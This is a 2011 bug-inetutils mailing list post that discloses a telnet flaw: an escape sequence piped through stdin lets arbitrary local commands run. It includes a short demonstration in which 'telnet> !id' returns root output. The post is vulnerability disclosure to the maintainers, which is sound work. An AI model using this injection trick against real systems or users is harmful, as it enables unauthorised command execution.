bug-inetutils
[
Top
][
All Lists
]
Advanced
[
Date Prev
][Date Next][
Thread Prev
][Thread Next][
Date Index
][
Thread Index
]
[bug-inetutils] telnet security advisory
From
:
sha0
Subject
:
[bug-inetutils] telnet security advisory
Date
:
Wed, 28 Sep 2011 02:06:18 +0200
Hello,
Is posible to inject a scape sequence via stdin to telnet, and arbitrary comands will be executed,
for example:
# cat evil-file | telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
telnet> !id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),1
0(wheel),19(log)
Connection closed by foreign host.
I think is very dangerous despite of few admins use telnet for moving file like this,
there is attached a detailed security advisory.
regards
2011-002.adv
Description:
Binary data
reply via email to
[Prev in Thread]
Current Thread
[Next in Thread]
[bug-inetutils] telnet security advisory
,
sha0
<=
Prev by Date:
[bug-inetutils] [RFC]: Tftpd fails with IPv4 mapped as IPv6.
Previous by thread:
[bug-inetutils] [RFC]: Tftpd fails with IPv4 mapped as IPv6.
Index(es):
Date
Thread